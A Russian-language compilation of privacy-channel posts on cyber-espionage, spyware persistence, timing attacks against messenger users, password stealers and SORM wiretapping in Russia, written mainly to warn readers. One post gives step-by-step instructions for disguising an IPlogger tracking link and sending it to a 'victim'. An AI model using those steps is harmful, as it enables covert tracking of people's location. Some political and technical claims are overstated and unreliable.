Все, что необходимо простому пользователю, − посетить специализированный форум: в русскоязычной части интернета это exploit, в англоязычной − hackforums, и выбрать подходящее программное обеспечение класса RAT. Из этических соображений мы не будем описывать дальнейшие шаги, единственное, хотим обратить внимание, что попытки заразить кого-либо кроме себя могут привести вас на скамью подсудимых. Например, житель Рима Энтони С. попал под суд в начале 2017 года за установленное бывшей девушке приложение для слежки за ней. Он несколько месяцев следил за ее смартфоном, пока не был арестован итальянской полицией. И таких случаев, как с Энтони, немало.
Условный Энтони отличается от профессиональных хакеров тем, что он не скрывает, куда программа отправляет данные. Профессионалы приобретают абузоустойчивые сервера в офшорных датацентрах, оплачивая их от имени подставных лиц, и тщательно скрывают их местонахождение. Условный Энтони или приобретет управляющий сервер на популярном хостинге, оформит на свои данные и оплатит со своей банковской карты (конечно, хостинг сразу выдаст его), или, того хуже, Энтони воспользуется серверами приложения, предназначенного для контроля за детьми, разработчики которого, чтобы не быть обвиненными в разработке вредоносного ПО, крайне трепетно относятся к запросам правоохранительных органов.
Но это лирика, чтобы вы могли понять: мнимая простота и доступность инструментов для кибершпионажа может привести к вполне реальному сроку. Как бы вам не казалось обратное, настоятельно советую не лезть в эту тему.
Кстати, программы для кибершпионажа часто разрабатываются правоохранительными органами как приманка для ловли нарушителей или хакерами как приманка для жертв. Так, в свое время в Cobian RAT, активно распространявшемся на андеграунд-форумах и представлявшемся едва ли не как идеальная программа, был обнаружен бэкдор. Пользователь скачивал себе программу, чтобы заражать жертв, и в этот момент сам становился жертвой программы. По-своему, это даже немного справедливо.
Но вернемся к кибершпионажу. Многие верят в антивирусы, попадаясь на рекламные лозунги компаний из серии «надежная защита ваших устройств» или «принципиально новый уровень безопасности»... Если бы антивирусы могли защитить от шпионского ПО, его просто не было бы, а эта глава состояла из одного предложения: «Просто установите себе антивирус и более вам нечего забивать себе голову угрозой кибершпионажа».
Увы, вредоносное программное обеспечение для кибершпионажа тестируется на предмет обнаружения антивирусами. Если антивирусы знают о существовании вредоносного ПО, то создатели этого ПО его криптуют, делая неузнаваемым. Мы подробнее расскажем об этом в рамках главы о вредоносном программном обеспечении.
А иногда и сами антивирусы становятся инструментом для кибершпионажа. Предполагаю, что историю Касперского и АНБ вы все знаете, я вам расскажу другой случай. DU Antivirus Security − популярный антивирус для Android, который по некоторым данным установили до 50 миллионов человек, шпионил за пользователями, на чем и был пойман исследователями из Check Point.
DU Antivirus Security разработан DU Group, входящей в конгломерат Baidu. Приложение собирало уникальные индентификаторы устройства, список контактов, журнал вызовов и другую информацию, а затем отправляло ее на сервера, зарегистрированные на сотрудника Baidu. Видите, шпионить могут даже те, кто должен защищать от этого.
Но я опять увлекся, в рамках курса я немало расскажу вам о методах кибершпионажа и инструментах защиты. Обнаружить и удалить шпионское программное обеспечение гораздо сложнее, и некоторые наивно верят, что им поможет смена компьютера или переустановка системы...
Миф
Смена компьютера, переустановка системы, установка антивируса или вызов специалиста по обнаружению вредоносного программного обеспечения поможет избавиться от профессионального ПО для кибершпионажа.
Реальность
Профессиональные программы для кибершпионажа прекрасно адаптированы к ситуации смены физического компьютера или переустановки системы − разумеется, ни у антивируса, ни у специалиста почти нет шансов обнаружить их.
Давайте разберем вопрос предметно. Смена компьютера или переустановка операционной системы − радикальный и часто эффективный ход, но если мы говорим о профессиональном кибершпионаже с использованием профессионального ПО, это работает далеко не всегда.
Представьте себя на месте злоумышленника, который должен следить за вами, держит ли он в голове сценарий смены устройства или переустановки ОС? Скорее всего, да, если мы, конечно, говорим об адресном кибершпионаже, где первая фаза − внедрение, а вторая − закрепление. Какие варианты закрепиться есть? Их как минимум три: записать вредоносное программное обеспечение на внешние носители, внедриться в прошивку устройства и «склеиться» с важными данными.
Самый интересный путь − внедрение в прошивку жесткого диска, например, таким образом часто действует вредоносное программное обеспечение АНБ США или связанных с ним групп. Согласно расследованию Лаборатории Касперского именно так функционирует софт группировки хакеров Equation. Уязвимыми оказались модели жестких дисков таких известных компаний, как Seagate, Western Digital, Toshiba, Maxtor, IBM и других.
При внедрении вредоносного ПО в прошивку переустановка системы с форматированием диска становится абсолютно бесполезной, антивирусы тоже не способны достать его там. Единственным эффективным методом является замена инфицированного компонента: вытащить жесткий диск, вынести в поле, облить бензином и сжечь. Но и это может не помочь...
Для предотвращения потери контроля над жертвой при замене зараженного компонента обычно используется запись вредоносного программного обеспечения на внешние носители, коими могут выступать не только флешки, но и телефон, способный помимо простого носителя стать и самостоятельным инструментом для кибершпионажа. И для заражения вам абсолютно не надо подключать телефон к компьютеру.
Как правило, обязательно заражается Wi-Fi роутер жертвы для контроля интернет-трафика. Имея полный удаленный доступ к компьютеру, это не такая сложная задача, а заразив Wi-Fi роутер, можно заражать все устройства, которые к нему подключаются, в том числе другие компьютеры и телефоны.
Благодаря публикации архива секретных документов ЦРУ под кодовым названием Vault 7 миру стало известно о CherryBlossom − фреймворке для взлома домашних роутеров, созданного при поддержке Стэнфордского научно-исследовательского института. Список роутеров, которые были уязвимы, впечатлял, в нем были модели таких компаний, как Apple, D-Link, Linksys, Cisco, Belkin и других.
Но вернемся к устройству жертвы, за которой ведется слежка. Разумеется, пользователь может уничтожить компьютер, уничтожить внешние носители, уничтожить телефон и роутер, но вряд ли он захочет расстаться со своими ценными файлами. Их-то и постарается заразить злоумышленник. Вы покупаете новое устройство, в новой стране подключаетесь к новому Wi-Fi, запускаете свой документ Word − и вы снова жертва слежки.
Есть ли выход? Безусловно, есть, и мы о нем будем говорить в рамках данной книги. Эдвард Сноуден, например, оставлял телефон выключенным... говорят, даже в сейфе. Мне не известно, чтобы немодифицированные выключенные телефоны могли использовать как жучок. Однако отслеживать координаты выключенного смартфона при наличии в нем аккумулятора спецслужбы умеют.
С другой стороны, если у вас, например, iPhone с жучком DROPOUTJEEP от АНБ, вас с высокой долей вероятности смогут слушать и при выключенном устройстве (название жучка устарело, наверняка его уже изменили). Тем не менее, вы никак не узнаете о наличии в вашем мобильном устройстве жучка, потому тут только один совет: если вы персона, которая может быть интересна спецслужбам, не заказывайте устройства с доставкой на свои данные или на данные членов вашей семьи, сходите в магазин и купите случайное устройство.
Если вы персона, которая может быть интересна спецслужбам, не заказывайте устройства с доставкой на свои данные или на данные членов вашей семьи, сходите в магазин и купите случайное устройство
Почему я все время говорю только о профессиональном кибершпионаже? Иногда бывает кибершпионаж ради удовольствия. Не удивляйтесь, но за вами могут шпионить от скуки либо для продажи видеозаписей с вашей веб-камеры, особенно это опасно для молодых симпатичных девушек. Ранее подобные ролики можно было без проблем найти на YouTube, сегодня их стараются удалять.
Обычная забава злоумышленников: вывести что-нибудь на экран, например сын показывает что-то матери, − и в этот момент на экран выводится порно извращенного характера. Реже собранные данные, в основном интимного плана, используются для шантажа. Сами судите: злоумышленник записывает или крадет ваше интимное видео, имея доступ к компьютеру, собирает список ваших друзей, родственников и коллег в социальных сетях, а затем делает предложение − либо вы платите ему деньги, например $2000, либо ваше интимное видео будет отправлено каждому из списка друзей, родственников и коллег.
Промышленный кибершпионаж
Я могу написать много всего интересного на эту тему, но вступительная глава предполагает только знакомство с угрозой и предназначена для широкого круга читателей. Потому предлагаю познакомиться с промышленным кибершпионажем на примере взлома Hacking Team.
Промышленный кибершпионаж − кибершпионаж в отношении компаний, как правило, с целью добычи какой-либо ценной информации. Hacking Team − итальянская компания, которая разрабатывала (и, к сожалению, разрабатывает по сей день) инструменты для кибершпионажа и продавала их правительствам и правоохранительным органам, иными словами, разрабатывала инструменты для шпионажа за вами. Потому для меня взлом Hacking Team − дело справедливое.
Результатом взлома стала публикация 400 ГБ корпоративных данных компании, которые включали информацию о заказах и заказчиках, письма корпоративной почты, исходный код разработок, информацию об исследованиях. Хотя, как правило, при промышленном кибершпионаже злоумышленники или используют информацию в своих нуждах, или кому-то ее продают.
В результате публикаций всплыло сотрудничество Hacking Team с правительствами таких, мягко говоря, недемократических стран, как Ливия и Судан. Очень часто кибершпионаж ведется с целью найти компрометирующую информацию и затем в нужный момент использовать ее против жертвы.
Приведу пример не совсем из мира бизнеса, но наверняка известный каждому из вас. Хилари Клинтон была безоговорочным фаворитом предстоящих президентских выборов, пока в один из дней на портале WikiLeaks не были опубликованы десятки тысяч писем, отправленных с ее электронного почтового ящика.
Сам почтовый ящик, вероятнее всего, был взломан еще задолго до этого, но выложили эти данные ровно в тот момент, когда Хилари так не нужны были скандалы, обвинения и расследование ФБР. Подобное пренебрежение безопасностью стоило Клинтон президентского кресла, которое досталось Дональду Трампу.
Если не хотите оказаться на месте Хилари Клинтон, чистите свой почтовый ящик, ну и конечно настройте его комплексную безопасность.
Как чистить и настраивать комплексную безопасность электронной почты, мы расскажем вам в рамках данного курса.
Поскольку корпоративная безопасность не входит в список тем данного курса, мы ограничимся лишь общей информацией о решениях. Безопасность компании не отделима от личной безопасности ее сотрудников, и именно о ней мы будем говорить в рамках курса.
 
IMG_20200623_004351_005.jpg

Тайминг-атака. Как спецслужбы деанонимизируют пользователей мессенджеров.

ВСЯ ИНФОРМАЦИЯ ПРЕДОСТАВЛЕНА В ОЗНАКОМИТЕЛЬНЫХ ЦЕЛЯХ, МЫ НЕ ПРИЗЫВАЕМ К ДЕЙСТВИЯМ
Представьте себе ситуацию: вы сотрудник спецслужбы, и ваша задача – вычислить особо опасного преступника, занимающегося шантажом и появляющегося в сети периодически и только для передачи данных. Для преступной деятельности он завел отдельный ноутбук, из которого «вырезал» микрофон, колонки и камеру. Разумное решение, учитывая, что колонки тоже умеют слушать.
В качестве операционной системы он использует Tails, хотя для максимальной анонимности стоило бы взять Whonix. Так или иначе, весь трафик идет через Tor, он не доверяет VPN, да и для работы в Даркнете Tor ему все равно необходим.
Для общения он использует Jabber с PGP-шифрованием, он мог бы поставить и Телеграм, но это представитель старой школы преступников. Даже если у вас будет доступ к серверу Jabber, вы сможете получить лишь зашифрованные данные и IP-адреса Тор. Это бесполезная информация.
Преступник работает по принципу «молчание-золото», лишнего не скажет, ссылки или файла не откроет. Известно лишь, что он должен находиться в одной стране с вами. Казалось бы, шансов установить его личность нет, но это иллюзия, установить его личность можно несмотря на все принимаемые им меры.
Описанный случай идеален для применения тайминг-атаки по мессенджеру. Первым делом необходима программа, которая будет отслеживать и записывать все входы и выходы пользователя. Он появился в сети – система сразу отмечает у себя время, ушел – система записала время выхода.
Лог выглядит примерно так:

IMG_20200623_004458_059.jpg
Теперь на руках у вас есть лог его активности за несколько дней, пришло время воспользоваться системой ОРМ (оперативно-розыскных мероприятий). Подобные системы есть в распоряжении спецслужб большинства стран, в России это СОРМ. Нужно выяснить, кто в эти временные промежутки +/- 5 минут в вашей стране подключался к сети Tor.
Мы знаем, что цель, которую необходимо деанонимизировать, подключилась 22.04.2018 в 11:07 и отключилась в 12:30. В эти же временные точки (+/- 5 минут) на территории страны подключились к сети Tor и отключились от нее 3000 человек. Мы берем эти 3000 и смотрим, кто из них снова подключился в 14:47 и отключился в 16:54, как думаете, сколько человек останется?
Так, шаг за шагом, круг сужается, и в итоге вам удастся вычислить место выхода в сеть преступника. Чем чаще он заходит в сеть и чем меньше в это время других пользователей, тем быстрее сработает тайминг-атака.
Что может помешать проведению тайминг-атаки
Постоянная смена точек выхода в сеть делает подобную атаку бессмысленной. Если же цель периодически меняет точки выхода, это может затруднить поиск, но является заранее допустимым вариантом и не способно запутать систему.
Мы надеемся, что наши читатели не относятся к разыскиваемым преступникам и им не придется кочевать из одного кафе с публичным Wi-Fi в другое. Однако вторым советом против тайминг-атаки стоит воспользоваться каждому. Речь идет об отключении на уровне мессенджера передачи информации о статусе либо установлении постоянного статуса «офлайн». Большинство мессенджеров предоставляют одну из подобных возможностей.
Вот так это выглядит в Телеграм:

IMG_20200623_004820_806.jpg

Если в вашем мессенджере возможно скрыть данные о вашем статусе, скройте эту информацию.
Дополнительным инструментом защиты от тайминг-атаки может стать прекращение включения мессенджера вместе с подключением к сети. Как вы можете понять из описания атаки, сверяется время входа/выхода в сеть и появление на связи/уход в офлайн в мессенджере. Допускается погрешность, но она не должна быть очень большой.
Если цель атаки - подключится к Tor и лишь спустя час запустит мессенджер, очень сложно будет связать вход в сеть и статус в мессенджере. Кроме этого, тайминг-атаки абсолютно бесполезны против анонимного мессенджера Bitmessage.
 
IMG_20200623_093848_015.jpg

Как отследить IP-адрес с помощью картинки

Добрый день, друзья. На сегодняшний день достаточно одного перехода пользователя по ссылке с картинкой, чтобы узнать его IP-адрес и примерное местоположение компьютера. А создать подобную ссылку занимает буквально несколько секунд и кликов мышью.

Чтобы сгенерировать ссылку с трекером, нам понадобиться старый добрый IPlogger, о котором я уже рассказывал не один раз, любая картинка, а также сервис сокращения ссылок и онлайн хранилище файлов.

Настройка?‍?

1. Загружаем любую картинку на сервис для хранения фото. Например, на Google Photo или Google Drive.
2. После того, как мы загрузили фотографию в хранилище, копируем ссылку на этот файл с помощью правой кнопки мыши.
3. Открываем сайт IPlogger и вставляем ссылку в поле «URL & Image Shortener», нажимаем кнопку «Get IPLogger coge».
4. Копируем получившуюся ссылку из поля «Your IPLogger link for collecting statistics» и переходим на сервис Bitly, чтобы замаскировать ссылку.
5. Копируем и отправляем получившуюся ссылку будущей жертве.
6. Открываем вкладку «Logged IP’s» на сайте IPlogger и ждем, пока пользователь перейдет по ссылке.

Когда жертва перейдет по ссылке, у нее откроется ничем не примечательная фотография. А у вас появится окно с IP-адресом и примерной геопозицией компьютера.
 
IMG_20200623_222341_492.jpg

Почему не стоит сохранять пароли в браузере

Добрый вечер, друзья. Уверен, что многие из вас слышали о таком классе троянов , как стилеры. Их функционал заключается в краже сохраненных в системе паролей и отправке их злоумышленнику. Данный вирус пробирается в хранилища часто используемых программ (в основном браузеров) и ворует оттуда все: сохраненные вами файлы Cookie, логины и пароли. Затем стиллер отправляет полученные данные злоумышленнику на почту.

Иногда у такого типа вируса есть дополнительная функция самоудаления. Наивный пользователь даже и не поймет, что его информацию похитили, пока пароль не перестанет подходить к его, например, почте, социальной сети или чего хуже, к электронным кошелькам по типу Киви или PayPal.

Почему эта атака настолько опасна?

⚠️ Зачастую, антивирусные программы против стилера бессильны, ибо троян можно без труда закриптовать.

Как обезопасить себя

Данный вирус едва ли сможет как-то вам навредить, если вы не сохраняете пароли в браузере, а записываете их где-то в зашифрованных базах. Ну и еще один момент. Стилеры, как правило, пишут для популярных браузеров.
 
IMG_20200624_183038_139.jpg


Как организована прослушка в России
ВСЯ ИНФОРМАЦИЯ НА КАНАЛЕ ПРЕДОСТАВЛЕНА В ОЗНАКОМИТЕЛЬНЫХ ЦЕЛЯХ, МЫ НЕ ПРИЗЫВАЕМ К ДЕЙСТВИЯМ

«Не по телефону». «Сейчас перезвоню с другого номера». «Давай выйдем на улицу, прогуляемся, тут лучше не говорить». Такие фразы прочно вошли в жизнь российского истеблишмента, а ведь еще несколько лет назад, жалующихся на прослушку телефонов и кабинетов принимали за полусумасшедших, вроде тех, кто носит шапочки из фольги и верит в зомбирующие лучи КГБ. Сегодня все знают: слушают всех, слушают без оглядки на закон и материалы этих прослушек чаще используют не в суде, а в политических интригах, доносах, провокациях. Мы поговорили с одним из профессионалов теневого рынка электронной разведки, чтобы выяснить, как работает эта сфера.
На языке правоохранительных органов прослушка телефонов и контроль интернет-трафика называются аббревиатурой «СОРМ» - «Система технических средств для обеспечения функций оперативно-розыскных мероприятий».
СОРМ-1 – это комплекс мероприятий, направленных на прослушку мобильной связи.
СОРМ-2 – мобильного интернет-трафика.
Сегодня такие методы расследования выходят на первый план, затмевая традиционные криминалистические подходы. Соответственно, подразделения, отвечающие за СОРМ, становятся все более влиятельными в составе органов внутренних дел. В Свердловской области это, например, бюро специальных технических мероприятий (БСТМ) ГУ МВД по Свердловской области и оперативно-технический отдел (ОТО) УФСБ по Свердловской области.
По закону, прослушка телефонов и контроль интернет-трафика возможны только по решению суда. Правда, закон позволяет следователям «включать запись» и без такового, если дело срочное и прослушка необходима для предотвращения готовящегося преступления. Примерно по такому же принципу следователям «в виде исключения» разрешают проводить обыски, получая санкцию суда уже постфактум. Как и в случае с обысками, часто правоохранители пользуются этой нормой, чтобы получать бесконтрольный доступ к чужим тайнам. Существуют также способы легализовать незаконную прослушку, поместив имя и телефон нужной персоны в длинный перечень подозреваемых по какому-нибудь уголовному делу. Как говорят источники в органах, судьи почти никогда не вникают, каким образом та или иная фамилия связана с уголовным делом, и подписывают разрешения «одним махом». Такие судебные решения носят гриф «секретно», и кто оказался в списках «на прослушку», гражданам не узнать никогда.
Впрочем, специалисты, занимающиеся прослушкой, говорят: сегодня все чаще граждан «ставят на запись» и вовсе без каких-либо решений суда. У каждого оператора связи установлена аппаратура, позволяющая силовикам в любое время получать доступ к разговорам любого клиента (к этому операторов обязывает закон). А в региональном управлении ФСБ есть терминал удаленного доступа, с помощью которого можно в несколько кликов начать слушать любого пользователя мобильной связи. По закону, право вести прослушку имеют несколько специальных служб. Кроме самой ФСБ, это МВД, ФСКН, ГУФСИН, таможня, ФСО, СВР. Но контроль за самой аппаратурой, обеспечивающей работу СОРМ-1 и СОРМ-2, находится именно у ФСБ. Как объясняют специалисты, чтобы поставить тот или иной номер на прослушку, сотрудникам из полицейского бюро специальных технических мероприятий не обязательно бежать в ФСБ и просить нажать кнопочку: в МВД и других органах, ведущих оперативно-разыскную деятельность, есть собственные терминалы доступа. Но они подключены «через ФСБ», то есть главный ключ все равно расположен у чекистов.
«Зачем вам столько телефонов?»
Как уберечься от прослушки? Почти никак. Во-первых, бесполезно менять SIM-карты: на прослушку ставят не номер мобильного, а уникальный номер телефонного аппарата (IMEI). Какая бы симка не была установлена в телефоне, он все равно будет «в прямом эфире». Многие представители истеблишмента и бизнесмены носят с собой несколько телефонов, считая, что один «обычный» слушается, а другие – «левые» - нет.
«Это наивно. Если человека поставили на прослушку, сотрудники органов постоянно получают информацию о местонахождении его телефона. Для этого в телефоне не обязательно должен быть установлен модуль GPS, местоположение даже самой простой и дешевой трубки определяется по базовым станциям с точностью до одного метра. И если вы таскаете с собой несколько трубок, по данным геолокации видно, что рядом с вашим «основным» номером всегда есть 2-3 других. Их тоже сразу же ставят на прослушку, поэтому ходить с кучей телефонов совершенно бессмысленно».
Впрочем, есть небольшой фокус с двумя трубками, который позволяет относительно надежно сохранить тайну переговоров. «Допустим, есть два аппарата – A и B. A используется постоянно, и есть основания полагать, что его слушают. B – для конфиденциальных разговоров, зарегистрирован на другое лицо. В этом случае A и B никогда не должны быть включены одновременно и рядом. Если нужно сделать звонок по «секретному» телефону B, вы выключаете A, отъезжаете подальше, в зону действия другой базовой станции, потом включаете B, делаете звонок. Потом выключаете B, снова едете к другой базовой станции и уже тогда включаете A», - рассказывает наш собеседник. Другой способ – постоянно хранить «секретный» телефон в каком-нибудь скрытом месте, всякий раз приезжая к нему с выключенным «основным» мобильником.
Особо осторожные жертвы прослушек предпочитают выключать телефон во время важного разговора или прятать его куда подальше. Возможность записи через телефон в режиме ожидания существует, но такая технология применяется нечасто. «В этих случаях используется т.н. микрофонный эффект. Такое можно сделать, только если в непосредственной близости от собеседников работает команда специалистов. Приемник сигнала и средство записи должны находиться где-то недалеко.
С анализом интернет-трафика подозрительных граждан (СОРМ-2) у силовиков дела обстоят пока несколько хуже, чем с прослушкой разговоров. Хотя операторы связи точно так же предоставляют спецслужбам любую информацию, сам анализ этих данных довольно сложен. Любой смартфон постоянно скачивает и отправляет огромное количество данных. До последнего времени существовала огромная проблема в том, чтобы вычленить из всей этой массы интересующую информацию, например переписку в Skype. Однако теперь эта задача в целом решена и даже в регионах научились читать интернет-мессенджеры.
Может быть, силовикам бы и хотелось «слушать всех», но в реальности под постоянным наблюдением всего 200-300 человек в Екатеринбурге. Большинство из них – подозреваемые в экстремизме (в первую очередь исламистского толка) и терроризме, члены находящихся в разработке ОПГ, участники непрозрачных финансовых операций крупного масштаба («обналичники» и т.п.). Лишь не более 10% от всей массы «поднадзорных» слушают по политическому заказу.
«Совершенно точно слушают губернатора, его ближайшее окружение, первых лиц города. Депутатов Заксобрания и гордумы – вряд ли, только если кого-то заказали конкуренты. Но это редкий случай, по телефону никто ничего важного давно не говорит, и тратить по 100 тысяч рублей в день на прослушку конкурента готовы немногие», - рассказывает источник.
В последнее время появился еще один проверенный способ стать жертвой прослушки - регулярно критиковать действующую власть или ходить на демонстрации протеста. Конечно, всех участников уличных акций прослушивать не будут, но самых активных – вполне.
В последнее время все более значимую роль в структуре СОРМ играет анализ информации, собранной в социальных сетях. Спецслужбы имеют доступ ко всей переписке, ведущейся в российских социальных сетях, утверждает наш собеседник. C Facebook дело обстоит сложнее, но и тут тайна общения не гарантирована.
«Относительно безопасный способ общения – через западные почтовые сервисы - например, Gmail. Еще эффективна сеть Tor, гарантирующая анонимность пользователям. С ее помощью, в том числе, американские журналисты общаются со своими информаторами».
Редкий российский бизнесмен и политик сегодня обсуждает по телефону что-нибудь важнее рыбалки и футбола. Поэтому, помимо анализа, собственно, текстов переговоров, профессионалы электронной разведки занимаются обработкой больших массивов данных, выявляя математические закономерности, неявные связи, строя на этом основании гипотезы о взаимодействии тех или иных групп или персон. Материалом для этого могут служить телефонные звонки, электронные письма, банковские операции, операции по регистрации или ликвидации юридических лиц и т.п.
Перлюстрация электронной переписки, мониторинг телефонных переговоров зашли уже так далеко, как и не снилось авторам романов-антиутопий. Наверное, нередко мощь СОРМов помогает предотвратить подлинные теракты или настоящие преступления. Но для общества куда заметнее случаи, когда методы электронной разведки используются для политического преследования и не имеют никакого отношения к законным процедурам. При этом от бесконтрольной слежки страдают не только оппозиционеры, но и лояльные Кремлю политики. Собранный при помощи электронных средств компромат часто становится орудием элитной борьбы против тех, кто еще недавно сам заказывал прослушку своих врагов. В этом смысле электронная разведка превратилась в опасность, от которой не застрахован никто.
 
Сверху Снизу